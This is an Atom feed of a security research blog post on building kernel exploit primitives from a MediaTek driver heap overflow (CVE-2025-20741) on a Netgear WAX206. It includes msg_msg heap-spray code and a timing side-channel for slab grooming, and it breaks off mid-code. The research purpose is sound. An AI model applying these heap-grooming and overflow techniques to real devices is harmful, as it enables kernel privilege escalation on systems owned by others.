<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="4.4.1">Jekyll</generator><link href="https://blog.coffinsec.com/feed.xml" rel="self" type="application/atom+xml" /><link href="https://blog.coffinsec.com/" rel="alternate" type="text/html" /><updated>2026-04-03T17:45:16+00:00</updated><id>https://blog.coffinsec.com/feed.xml</id><title type="html">hyprblog</title><subtitle>Vulnerability research, software development, and other technobabble.</subtitle><author><name>hyper</name></author><entry><title type="html">kernel alchemy pt. 1: developing exploit primitives with CVE-2025-20741</title><link href="https://blog.coffinsec.com/0day/2026/04/02/kernel-alchemy-pt1.html" rel="alternate" type="text/html" title="kernel alchemy pt. 1: developing exploit primitives with CVE-2025-20741" /><published>2026-04-02T00:00:00+00:00</published><updated>2026-04-02T00:00:00+00:00</updated><id>https://blog.coffinsec.com/0day/2026/04/02/kernel-alchemy-pt1</id><content type="html" xml:base="https://blog.coffinsec.com/0day/2026/04/02/kernel-alchemy-pt1.html"><![CDATA[<p>This post picks up where the last one left off and will use a couple of the bugs in the mt7622
driver as starting points to develop kernel exploit primitives on the Netgear WAX206. We’ll work
through <code class="language-plaintext highlighter-rouge">msg_msg</code> heap grooming, OOB reads via header corruption, function pointer hijacking through
<code class="language-plaintext highlighter-rouge">seq_operations</code>, and page-level read/write via <code class="language-plaintext highlighter-rouge">pipe_buffer</code> corruption.</p>

<h2 id="introduction">introduction</h2>

<p>Hello again! I hope you all had a bit of fun with <a href="https://blog.coffinsec.com/0days/2025/12/15/more-like-mediarekt-amirite.html">my last post</a> going over the details of all of
the bugs I reported to MediaTek last year and the <em>interesting</em> behavior from their triage team. I
left you all on a bit of a cliff-hanger last time so let’s get to the real fun and talk about
exploitation.</p>

<p>Having 20+ bugs to start with is pretty sweet since it provides a lot of opportunities to explore
different exploit strategies and learn about kernel exploitation in general. Considering this was my
first time exploiting real-world kernel bugs, the journey from bug to full-chain exploit wasn’t
immediately clear so I spent quite a bit of time experimenting with different techniques to get
familiar with kernel internals and build up a toolkit of primitives that I could eventually use for
a full exploit. Rather than jumping straight to the finished exploits, this post is going to focus
on the primitives themselves: what can be built from two common starting points — a heap overflow
and a heap address leak — and how those building blocks combine to create increasingly powerful
capabilities.</p>

<p>We’ll work through:</p>

<ul>
  <li><a href="#msg_msg-101">kernel heap grooming with <code class="language-plaintext highlighter-rouge">msg_msg</code></a></li>
  <li><a href="#timing-side-channels-to-improve-heap-grooming-reliability">timing side-channels for page boundary detection</a></li>
  <li><a href="#tech-oob-read-via-msg_msgm_ts-field-corruption">tech: OOB read via <code class="language-plaintext highlighter-rouge">msg_msg</code> header corruption</a></li>
  <li><a href="#tech-arbitrary-address-readfree-via-msg_msgnext-pointer-corruption">tech: arbitrary read+free via <code class="language-plaintext highlighter-rouge">msg_msg.next</code> pointer corruption</a></li>
  <li><a href="#tech-seq_operations-function-pointer-corruption">tech: <code class="language-plaintext highlighter-rouge">seq_operations</code> function pointer corruption</a></li>
  <li><a href="#tech-page-level-rw-via-pipe_bufferpage-corruption">tech: page-level read/write via <code class="language-plaintext highlighter-rouge">pipe_buffer.page</code> corruption</a> (PageJack-inspired)</li>
</ul>

<p>To be clear, none of these techniques are novel — they’ve all been documented in various writeups
and exploits over the years. The hope is that putting them together here with a focus on the
individual primitive components rather than in the context of a full exploit chain will be useful as
a reference or for getting ideas for use in your own exploits. All of the techniques are
demonstrated using the MediaTek bugs, but the concepts are generic; the same primitives apply to any
heap overflow in the SLUB allocator. A follow-up post will walk through full exploit chains that
leverage these primitives to achieve local privilege escalation.</p>

<p>The primitives described in this post were developed over a couple of months of experimentation on
the Netgear WAX206 with no kernel debugger; just a root shell, <code class="language-plaintext highlighter-rouge">dmesg</code>, and a lot of trial and
error. It was tough, but the constrained environment <em>definitely</em> made the process educational: many
of the techniques required building an intuitive understanding of allocator behavior by observing
crashes, reading through kernel code, and trying to reason about what the kernel was doing under the
hood. Talk about a baptism by fire.</p>

<p>Anyway, let’s get started! It’s gonna be a long one (again).</p>

<h2 id="background">background</h2>

<h3 id="starting-assumptions">starting assumptions</h3>

<p>Everything in this post builds on two primitives:</p>

<ol>
  <li><strong>A heap overflow</strong> into a known slab cache with attacker-controlled data</li>
  <li><strong>A heap address leak</strong> pointing to controlled data</li>
</ol>

<p>These are common enough starting points; many real-world kernel bugs provide one or both.
Luckily, the collection of bugs we’re working with has both, though a couple of these primitives
could still be used successfully without the heap address leak, given some minor tweaks.</p>

<h3 id="the-bugs">the bugs</h3>

<h4 id="cve-2025-20741-heap-overflow-in-vie_oper_proc">CVE-2025-20741: heap overflow in vie_oper_proc()</h4>

<p>This is the heap overflow used as the starting point for the techniques in this post. See the
<a href="/0days/2025/12/15/more-like-mediarekt-amirite.html">previous post</a> for a full RCA, but here are the key properties:</p>

<ul>
  <li>The <code class="language-plaintext highlighter-rouge">vie_oper_proc()</code> handler parses a user-supplied command string using <code class="language-plaintext highlighter-rouge">sscanf()</code> with a <code class="language-plaintext highlighter-rouge">%s</code> format specifier into a heap-allocated buffer <code class="language-plaintext highlighter-rouge">ctnt</code></li>
  <li>The buffer is allocated using an incorrect size calculation that results in it landing in the <code class="language-plaintext highlighter-rouge">kmalloc-128</code> slab cache</li>
  <li>Since <code class="language-plaintext highlighter-rouge">sscanf("%s", ...)</code> doesn’t enforce any length limit, the write is effectively unbounded</li>
</ul>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="c1">// allocation ends up in kmalloc-128 due to buggy sizeof() usage</span>
    <span class="n">os_alloc_mem</span><span class="p">(</span><span class="n">pAd</span><span class="p">,</span> <span class="p">(</span><span class="n">UCHAR</span> <span class="o">**</span><span class="p">)</span><span class="o">&amp;</span><span class="n">ctnt</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">((</span><span class="n">MAX_VENDOR_IE_LEN</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="mi">2</span><span class="p">));</span>

    <span class="c1">// sscanf parses unbounded string into heap buffer — overflow</span>
    <span class="n">sscanf</span><span class="p">(</span><span class="n">arg</span><span class="p">,</span>
        <span class="s">"%d-frm_map:%x-oui:%6s-length:%d-ctnt:%s"</span><span class="p">,</span>
        <span class="o">&amp;</span><span class="n">oper</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">frm_map</span><span class="p">,</span> <span class="n">oui</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">length</span><span class="p">,</span> <span class="n">ctnt</span><span class="p">);</span>
</code></pre></div></div>
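<p>To see why the allocation ends up so small, here is a minimal sketch of the <code class="language-plaintext highlighter-rouge">sizeof</code> mistake in isolation. The value of <code class="language-plaintext highlighter-rouge">MAX_VENDOR_IE_LEN</code> below is a placeholder picked for illustration (not the driver’s real definition) and both helper names are hypothetical.</p>

```c
#include <assert.h>
#include <stddef.h>

#define MAX_VENDOR_IE_LEN 255   /* placeholder value, for illustration only */

/* sizeof applied to an int-typed expression yields the size of an int,
 * not the value of the expression. Checked at compile time. */
static_assert(sizeof((MAX_VENDOR_IE_LEN + 1) * 2) == sizeof(int),
              "sizeof yields the size of the operand's type");

/* The size the buggy call actually requests. */
static size_t buggy_alloc_size(void)
{
    return sizeof((MAX_VENDOR_IE_LEN + 1) * 2);
}

/* The size that was presumably intended: the value of the expression. */
static size_t intended_alloc_size(void)
{
    return (MAX_VENDOR_IE_LEN + 1) * 2;
}
```

<p>Whatever the real constant is, the requested size is just <code class="language-plaintext highlighter-rouge">sizeof(int)</code>, which the allocator rounds up to its smallest cache.</p>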

<p>One constraint from the <code class="language-plaintext highlighter-rouge">sscanf()</code> parsing: the payload can contain <strong>no NUL bytes or whitespace</strong>, since a NUL ends the input string and <code class="language-plaintext highlighter-rouge">%s</code> stops at the first whitespace character. <code class="language-plaintext highlighter-rouge">sscanf()</code> also
appends a NUL terminator after the data, which means there’s always an extra zero byte written at
the end of the overflow. Something to work around, but not a showstopper.</p>
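<p>A rough way to vet payloads against this constraint before sending them is sketched below. The function names are hypothetical, and the whitespace set is an assumption: it covers the usual ASCII whitespace plus <code class="language-plaintext highlighter-rouge">0xa0</code>, which I believe the kernel’s ctype table also treats as a space, so it is rejected here to be conservative.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Bytes assumed to terminate a "%s" conversion (0xa0 is a conservative guess). */
static int is_scanf_space(unsigned char c)
{
    return c == 0x20 || (c >= 0x09 && c <= 0x0d) || c == 0xa0;
}

/* Returns 1 if the first len bytes contain no NUL and no whitespace. */
static int payload_survives_scanf_s(const unsigned char *buf, size_t len)
{
    assert(buf != NULL);
    for (size_t i = 0; i < len; i++) {
        if (buf[i] == 0x00 || is_scanf_space(buf[i]))
            return 0;
    }
    return 1;
}

/* Same check applied to the eight bytes of a 64-bit value such as a pointer. */
static int u64_survives_scanf_s(uint64_t v)
{
    unsigned char b[sizeof(v)];
    memcpy(b, &v, sizeof(v));
    return payload_survives_scanf_s(b, sizeof(b));
}
```

<p>For example, a page-aligned address like <code class="language-plaintext highlighter-rouge">0xffffffc01690b000</code> contains a zero byte and fails the check, so it can’t be written in full by this overflow.</p>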

<p>The overflow lands in <code class="language-plaintext highlighter-rouge">kmalloc-128</code>, which on the target device is shared by a number of interesting
kernel objects due to the lack of smaller general-purpose caches: <code class="language-plaintext highlighter-rouge">msg_msg</code> structs,
<code class="language-plaintext highlighter-rouge">seq_operations</code>, and others. The unlimited write size gives a lot of room to experiment with
different corruption targets.</p>

<p>Note: this bug requires <code class="language-plaintext highlighter-rouge">CAP_NET_ADMIN</code> to trigger (<code class="language-plaintext highlighter-rouge">iwpriv set</code>), which makes it unsuitable for an
unprivileged LPE. It’s used here purely as a convenient bug for demonstrating the techniques.</p>

<h4 id="rtmpioctlmac-heap-address-leak">RTMPIoctlMAC(): heap address leak</h4>

<p>The <code class="language-plaintext highlighter-rouge">RTMPIoctlMAC()</code> function handles the <code class="language-plaintext highlighter-rouge">iwpriv &lt;iface&gt; mac</code> debug command. During execution, it
prints a log message to <code class="language-plaintext highlighter-rouge">dmesg</code> containing the kernel heap address of the user-supplied argument
buffer:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>RTMPIoctlMAC():after trim space, ptr len=27, pointer(ffffffc01690b000)=feedface=...
</code></pre></div></div>

<p>The leaked address points to a buffer containing data we control. With one operation we get:</p>

<ol>
  <li>controlled data written at a kernel heap address</li>
  <li>that address leaked back to us</li>
</ol>

<p>Even without KASLR, heap addresses are difficult to predict given the constant churn of kernel
allocations. This primitive provides the known heap address that several of the techniques below
require.</p>
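<p>Pulling the address out of the log is a one-liner in practice. The sketch below parses a single log line in the format shown above; the function name is hypothetical, and how the line is obtained (reading <code class="language-plaintext highlighter-rouge">dmesg</code> output, for instance) is left out.</p>

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Extract the hex address inside "pointer(...)" from one log line.
 * Returns 0 and stores the address in *out on success, -1 otherwise. */
static int parse_leaked_ptr(const char *line, uint64_t *out)
{
    const char *p;
    unsigned long long v;

    assert(line != NULL && out != NULL);
    p = strstr(line, "pointer(");   /* skip any timestamp or prefix */
    if (p == NULL)
        return -1;
    if (sscanf(p, "pointer(%llx)", &v) != 1)
        return -1;
    *out = (uint64_t)v;
    return 0;
}
```

<p>Fed the sample line above, this yields <code class="language-plaintext highlighter-rouge">0xffffffc01690b000</code>.</p>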

<h3 id="target-specific-notes">target-specific notes</h3>

<p>The techniques in this post were developed on a <strong>Netgear WAX206</strong> (MediaTek MT7622, ARM64, Linux
4.4.198, SLUB allocator). A few characteristics of this target are worth noting up front since they
influence some of the implementation details:</p>

<ul>
  <li><strong>No KASLR</strong>: kernel symbol addresses are computable from the kernel image + known load address.
Infoleaks are still useful for heap addresses, but symbol addresses (e.g. for function pointer
targets) are known statically via <code class="language-plaintext highlighter-rouge">/proc/kallsyms</code> + kernel image.</li>
  <li><strong>No <code class="language-plaintext highlighter-rouge">CONFIG_SLAB_FREELIST_RANDOM</code></strong>: slab allocations are sequential, making heap grooming more
reliable and freelist corruption straightforward.</li>
  <li><strong>No <code class="language-plaintext highlighter-rouge">CONFIG_SLAB_FREELIST_HARDENED</code></strong>: freelist pointers are stored as plain addresses — no
obfuscation to deal with.</li>
  <li><strong>No <code class="language-plaintext highlighter-rouge">CONFIG_CHECKPOINT_RESTORE</code></strong>: <code class="language-plaintext highlighter-rouge">MSG_COPY</code> flag for <code class="language-plaintext highlighter-rouge">msgrcv()</code> is unavailable, which affects
how <code class="language-plaintext highlighter-rouge">msg_msg</code> sprays can be safely inspected (discussed in the foundations section).</li>
  <li><strong><code class="language-plaintext highlighter-rouge">kmalloc-128</code> is the smallest general-purpose cache</strong>: objects smaller than 128 bytes without a
dedicated cache all land here, which means <code class="language-plaintext highlighter-rouge">seq_operations</code> (32 bytes) and other potential target
objects share the cache with the vulnerable buffer overflowed by the <code class="language-plaintext highlighter-rouge">vie_oper_proc</code> bug. This
cache is also very noisy (~700+ active slabs), requiring larger sprays to reliably control the
slab layout.</li>
  <li><strong><code class="language-plaintext highlighter-rouge">dmesg</code> is world-readable</strong>: allows unprivileged access to the <code class="language-plaintext highlighter-rouge">RTMPIoctlMAC()</code> heap address
leak.</li>
</ul>

<p>On a modern hardened kernel, some of these techniques would need additional work: KASLR bypasses
(e.g. via other infoleak bugs, which we happen to have anyway :)), freelist pointer deobfuscation,
cross-cache strategies, etc. Still, the underlying concepts are the same.</p>

<h2 id="foundations-kernel-heap-grooming">foundations: kernel heap grooming</h2>

<p>When it comes to exploiting any heap-based bug the first place to start is usually establishing
heap grooming primitives. This is a foundational capability that most heap exploits rely on since
creating a predictable heap layout makes exploitation more reliable, and many techniques require the
ability to trigger allocs/frees at specific points in time.</p>

<p>So, let’s talk about <code class="language-plaintext highlighter-rouge">msg_msg</code>.</p>

<h3 id="msg_msg-101">msg_msg 101</h3>

<p>If you’ve ever looked into Linux kernel exploitation you’re probably already familiar with it, but for those
who aren’t, the idea is simple: you can use the System V message queue API to force controlled
allocations and frees in kernel slab caches. Every time you send a message to a queue with
<code class="language-plaintext highlighter-rouge">msgsnd()</code>, the kernel allocates a <code class="language-plaintext highlighter-rouge">msg_msg</code> struct on the heap; every time you read it back with
<code class="language-plaintext highlighter-rouge">msgrcv()</code>, the allocation is freed. This gives us a userspace-controlled mechanism for triggering
kernel allocations of varying sizes with controlled data that we can later free on-demand, the two
fundamental operations that are needed for reliable heap grooming.</p>

<p>With the basic concept covered, let’s go over a few key details. The <code class="language-plaintext highlighter-rouge">msg_msg</code> struct looks like
this (from <a href="https://elixir.bootlin.com/linux/v4.4.198/source/include/linux/msg.h#L39" target="_blank"><code class="language-plaintext highlighter-rouge">include/linux/msg.h</code></a>):</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">msg_msg</span> <span class="p">{</span>
    <span class="k">struct</span> <span class="n">list_head</span> <span class="n">m_list</span><span class="p">;</span>   <span class="c1">// +0x00: linked list pointers (prev, next)</span>
    <span class="kt">long</span> <span class="n">m_type</span><span class="p">;</span>               <span class="c1">// +0x10: message type</span>
    <span class="kt">size_t</span> <span class="n">m_ts</span><span class="p">;</span>               <span class="c1">// +0x18: message text size</span>
    <span class="k">struct</span> <span class="n">msg_msgseg</span> <span class="o">*</span><span class="n">next</span><span class="p">;</span>   <span class="c1">// +0x20: pointer to next segment (for large msgs)</span>
    <span class="kt">void</span> <span class="o">*</span><span class="n">security</span><span class="p">;</span>            <span class="c1">// +0x28: security pointer</span>
    <span class="cm">/* message body follows immediately at +0x30 */</span>
<span class="p">};</span>
</code></pre></div></div>

<p>The struct header is <code class="language-plaintext highlighter-rouge">0x30</code> (48) bytes and the message body is placed immediately after it in the
same allocation. This means the total allocation size is the body size plus 48 bytes, and <em>that</em>
determines which slab cache the message lands in. If we want to target <code class="language-plaintext highlighter-rouge">kmalloc-128</code> we can send a
message with a body of 80 bytes or less (80 + 48 = 128). For <code class="language-plaintext highlighter-rouge">kmalloc-256</code>, a body of 81 to 208
bytes will do it (208 + 48 = 256). This is one of the things that makes <code class="language-plaintext highlighter-rouge">msg_msg</code> so useful: by controlling the body
size, we can target whichever cache we want (up to <code class="language-plaintext highlighter-rouge">kmalloc-4096</code>).</p>
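<p>The size arithmetic is easy to get wrong by one, so it can help to put it in code. This is a small sketch assuming power-of-two caches from <code class="language-plaintext highlighter-rouge">kmalloc-128</code> up to <code class="language-plaintext highlighter-rouge">kmalloc-4096</code> as on this target; the helper names are made up for illustration.</p>

```c
#include <assert.h>
#include <stddef.h>

#define MSG_HDR_SIZE 0x30u   /* sizeof(struct msg_msg) on this 64-bit target */
#define KMALLOC_MIN  128u    /* smallest general-purpose cache (assumed) */
#define KMALLOC_MAX  4096u   /* largest cache a single msg_msg can reach */

/* Round an allocation size up to the power-of-two cache that serves it.
 * Returns 0 if the size does not fit in one msg_msg allocation. */
static size_t kmalloc_cache_for(size_t alloc_size)
{
    size_t cache = KMALLOC_MIN;

    if (alloc_size == 0 || alloc_size > KMALLOC_MAX)
        return 0;
    while (cache < alloc_size)
        cache <<= 1;
    return cache;
}

/* Cache that a message with the given body size lands in (header + body). */
static size_t cache_for_msg_body(size_t body_size)
{
    return kmalloc_cache_for(MSG_HDR_SIZE + body_size);
}

/* Largest body size that still fits in the given cache. */
static size_t max_body_for_cache(size_t cache_size)
{
    assert(cache_size >= KMALLOC_MIN && cache_size <= KMALLOC_MAX);
    return cache_size - MSG_HDR_SIZE;
}
```

<p>With these, <code class="language-plaintext highlighter-rouge">cache_for_msg_body(80)</code> evaluates to 128, while one more byte of body pushes the allocation into the next cache up.</p>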

<p>For messages whose body exceeds what fits in a single page alongside the header (4096 bytes minus the 48-byte header), the kernel
splits the remaining data across <code class="language-plaintext highlighter-rouge">msg_msgseg</code> segments, each one being a separate allocation with just an
8-byte header (<code class="language-plaintext highlighter-rouge">next</code> pointer) and the rest being message data. This turns out to be useful too,
since you still get an elastic grooming primitive but with more controlled data taking up the body
of the allocation. We’ll come back to this later.</p>
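<p>To make the split concrete, here is a sketch that computes the allocation sizes for a message of a given length. It mirrors my reading of the kernel’s allocation loop under the assumption of 4096-byte pages; the struct and function names are hypothetical.</p>

```c
#include <assert.h>
#include <stddef.h>

#define PAGE_SZ      4096u
#define MSG_HDR_SIZE 48u                        /* struct msg_msg header */
#define SEG_HDR_SIZE 8u                         /* struct msg_msgseg header */
#define DATALEN_MSG  (PAGE_SZ - MSG_HDR_SIZE)   /* data bytes in the first chunk */
#define DATALEN_SEG  (PAGE_SZ - SEG_HDR_SIZE)   /* data bytes per segment */

struct msg_layout {
    size_t head_alloc;      /* size of the msg_msg allocation */
    size_t nsegs;           /* number of msg_msgseg allocations */
    size_t last_seg_alloc;  /* size of the final segment, 0 if none */
};

/* Compute how a message body of len bytes is split across allocations. */
static struct msg_layout msg_layout_for(size_t len)
{
    struct msg_layout l = {0, 0, 0};
    size_t chunk = len < DATALEN_MSG ? len : DATALEN_MSG;

    l.head_alloc = MSG_HDR_SIZE + chunk;
    len -= chunk;
    while (len > 0) {
        chunk = len < DATALEN_SEG ? len : DATALEN_SEG;
        l.last_seg_alloc = SEG_HDR_SIZE + chunk;
        l.nsegs++;
        len -= chunk;
    }
    return l;
}
```

<p>A body of 4048 + 120 bytes, for instance, produces a full-page <code class="language-plaintext highlighter-rouge">msg_msg</code> plus a single 128-byte segment allocation, of which 120 bytes are controlled data.</p>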

<p>The basic grooming flow goes something like this:</p>

<ol>
  <li><strong>Spray</strong>: create a bunch of message queues and send one message per queue, sized to land in the
target slab cache. The goal is to fill up existing partial slabs and force the allocator to give
us fresh slabs where we control every object.</li>
  <li><strong>Poke holes</strong>: free a subset of those messages (e.g., every other one) by reading them back from
their queues. This creates gaps in the slab layout at predictable positions.</li>
  <li><strong>Trigger the bug</strong>: the vulnerable allocation fills one of the holes we created. If the grooming
went well, this allocation is now adjacent to a <code class="language-plaintext highlighter-rouge">msg_msg</code> struct we still own (or some other
target object we want to corrupt with the overflow that’s been allocated into one of the open
slots).</li>
</ol>
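<p>The first two steps can be sketched in userspace roughly as follows. This is a simplified illustration rather than the code used for the exploits: the function names and the 80-byte body limit (chosen to stay in <code class="language-plaintext highlighter-rouge">kmalloc-128</code>) are assumptions, and error handling is kept minimal.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/types.h>

#define BODY_MAX 80   /* largest body that keeps header + body in kmalloc-128 */

struct spray_msg {
    long mtype;             /* must be > 0 for msgsnd() */
    char mtext[BODY_MAX];
};

/* Step 1: create n private queues and send one message to each.
 * Returns the number of messages queued; qids[i] is -1 on failure. */
static size_t spray_one_per_queue(int *qids, size_t n, size_t body, unsigned char fill)
{
    struct spray_msg m;
    size_t sent = 0;

    assert(body <= BODY_MAX);
    m.mtype = 1;
    memset(m.mtext, fill, sizeof(m.mtext));
    for (size_t i = 0; i < n; i++) {
        qids[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0600);
        if (qids[i] < 0)
            continue;
        if (msgsnd(qids[i], &m, body, IPC_NOWAIT) == 0) {
            sent++;
        } else {
            msgctl(qids[i], IPC_RMID, NULL);
            qids[i] = -1;
        }
    }
    return sent;
}

/* Step 2: receive (and thereby free) the message on every other queue. */
static size_t poke_holes(const int *qids, size_t n)
{
    struct spray_msg m;
    size_t freed = 0;

    for (size_t i = 0; i < n; i += 2) {
        if (qids[i] < 0)
            continue;
        if (msgrcv(qids[i], &m, sizeof(m.mtext), 0, IPC_NOWAIT) >= 0)
            freed++;
    }
    return freed;
}

/* Remove all queues. Only sensible when nothing has been corrupted. */
static void destroy_queues(int *qids, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        if (qids[i] >= 0) {
            msgctl(qids[i], IPC_RMID, NULL);
            qids[i] = -1;
        }
    }
}
```

<p>After <code class="language-plaintext highlighter-rouge">poke_holes()</code> returns, the bug trigger goes in as step 3, with the hope that the vulnerable buffer reuses one of the freed slots.</p>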

<p>This is the basic recipe, and it’s more or less the same pattern used by every technique in
this post.</p>

<h3 id="tuning-heap-sprays">tuning heap sprays</h3>

<p>One of the goals of spraying is to get data put into fresh slabs where you control every object, so
you can predict exactly what’s adjacent to what. If the spray is too small, you end up just filling
existing partial slabs that share space with random kernel allocations you don’t control, so
figuring out the right size for the sprays matters.</p>

<p>How many messages that takes depends on how busy the target cache is. On a busy cache (e.g.
<code class="language-plaintext highlighter-rouge">kmalloc-128</code> when it’s the smallest general-purpose cache on the system) you might need 1000+
messages to exhaust the existing partial slabs and force fresh ones. Less contended caches may only
need a fraction of that. Depending on the target environment, timing side-channels can also be used
to try to detect new page allocations for better spray alignment (see the next section).</p>

<p>CPU pinning with <code class="language-plaintext highlighter-rouge">sched_setaffinity()</code> is also useful for improving the reliability of heap sprays.
Pinning to a single core means the exploit will consistently hit the same per-cpu slab cache, which
removes one source of unpredictability. The SLUB allocator serves allocations from per-cpu caches
first, and those must be exhausted before it will allocate fresh slabs. Dealing with a single
CPU’s allocations instead of 4 or 8 makes it much easier to get reliable heap behavior across runs.</p>
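<p>Pinning takes only a few lines. A minimal sketch, with a hypothetical helper name, assuming glibc (hence the <code class="language-plaintext highlighter-rouge">_GNU_SOURCE</code> define, which has to come before any include):</p>

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE   /* needed for sched_setaffinity() and the CPU_* macros */
#endif
#include <assert.h>
#include <sched.h>

/* Pin the calling thread to a single CPU.
 * Returns 0 on success, -1 on error (errno is set by sched_setaffinity). */
static int pin_to_cpu(int cpu)
{
    cpu_set_t set;

    assert(cpu >= 0 && cpu < CPU_SETSIZE);
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    return sched_setaffinity(0, sizeof(set), &set);   /* pid 0 = caller */
}
```

<p>Calling this once at the very start of the exploit, before any spraying, keeps every subsequent allocation on the same CPU’s caches.</p>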

<h3 id="timing-side-channels-to-improve-heap-grooming-reliability">timing side-channels to improve heap grooming reliability</h3>

<p>As mentioned briefly above, it’s possible to use timing side-channels to detect when the kernel
allocator has been forced to make an allocation through the buddy/page allocator (i.e. when it is
allocating a completely fresh slab). With some tuning for the target system, this can be used to
reliably detect page/slab boundaries.</p>

<p>The tl;dr on how this works is that once the allocator has completely exhausted all of the existing
partial slabs (both per-cpu and per-node) it must call into the page allocator to request fresh
pages to back a new slab. This is the slowest path for allocations (the per-cpu and per-node
freelists are meant to mitigate this impact) and the added latency is usually measurable from userspace
by calling <code class="language-plaintext highlighter-rouge">clock_gettime()</code> immediately before and after each allocation.</p>

<p>Implementing this is pretty simple: collect timing measurements before and after each allocation
call you trigger, then compute the mean and loop through the measurements to flag
outliers that exceed the mean by some multiplier (1.4x in the example below, but this value needs to be
tuned for the target system). Each of these outliers is likely to be an allocation
on a fresh slab, with the outliers near the tail of the spray being the most accurate.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// compute the number of slots remaining in the active slab after a spray based on the number of</span>
<span class="c1">// objects sprayed and the index in the spray where the last page boundary was detected</span>
<span class="k">static</span> <span class="kr">inline</span> <span class="kt">uint32_t</span> <span class="nf">spray_delta_to_page_boundary</span><span class="p">(</span><span class="kt">uint32_t</span> <span class="n">last_pg_idx</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">spray_size</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">slots_per_slab</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">last_pg_idx</span> <span class="o">+</span> <span class="n">slots_per_slab</span> <span class="o">-</span> <span class="mi">1</span> <span class="o">==</span> <span class="n">spray_size</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
    <span class="k">return</span> <span class="p">(</span><span class="n">last_pg_idx</span> <span class="o">+</span> <span class="n">slots_per_slab</span> <span class="o">-</span> <span class="n">spray_size</span><span class="p">)</span> <span class="o">-</span> <span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">inline</span> <span class="kt">long</span> <span class="nf">timespec_diff_ns</span><span class="p">(</span><span class="k">struct</span> <span class="n">timespec</span> <span class="o">*</span><span class="n">start</span><span class="p">,</span> <span class="k">struct</span> <span class="n">timespec</span> <span class="o">*</span><span class="n">end</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">return</span> <span class="p">(</span><span class="n">end</span><span class="o">-&gt;</span><span class="n">tv_sec</span> <span class="o">-</span> <span class="n">start</span><span class="o">-&gt;</span><span class="n">tv_sec</span><span class="p">)</span> <span class="o">*</span> <span class="mi">1000000000L</span> <span class="o">+</span> <span class="p">(</span><span class="n">end</span><span class="o">-&gt;</span><span class="n">tv_nsec</span> <span class="o">-</span> <span class="n">start</span><span class="o">-&gt;</span><span class="n">tv_nsec</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">int</span> <span class="nf">spray</span><span class="p">()</span> <span class="p">{</span>
    <span class="p">...</span>
    <span class="kt">long</span> <span class="n">timings</span><span class="p">[</span><span class="n">NUM_MSGS</span><span class="p">];</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">NUM_MSGS</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">clock_gettime</span><span class="p">(</span><span class="n">CLOCK_MONOTONIC</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">start</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">msgsnd</span><span class="p">(</span><span class="n">qids</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">msg</span><span class="p">,</span> <span class="n">body_size</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">fatal</span><span class="p">(</span><span class="s">"failed to send message %d"</span><span class="p">,</span> <span class="n">i</span><span class="p">);</span>
        <span class="p">}</span>
        <span class="n">clock_gettime</span><span class="p">(</span><span class="n">CLOCK_MONOTONIC</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">end</span><span class="p">);</span>
        <span class="n">timings</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">timespec_diff_ns</span><span class="p">(</span><span class="o">&amp;</span><span class="n">start</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">end</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="cm">/* Compute mean */</span>
    <span class="kt">long</span> <span class="n">sum</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">NUM_MSGS</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
        <span class="n">sum</span> <span class="o">+=</span> <span class="n">timings</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
    <span class="kt">double</span> <span class="n">mean</span> <span class="o">=</span> <span class="p">(</span><span class="kt">double</span><span class="p">)</span><span class="n">sum</span> <span class="o">/</span> <span class="p">(</span><span class="n">NUM_MSGS</span><span class="p">);</span>

    <span class="cm">/* Flag outliers (&gt;1.4x mean = suspected new slab page allocation) */</span>
    <span class="kt">double</span> <span class="n">outlier_mult</span> <span class="o">=</span> <span class="mi">1</span><span class="p">.</span><span class="mi">4</span><span class="p">;</span>
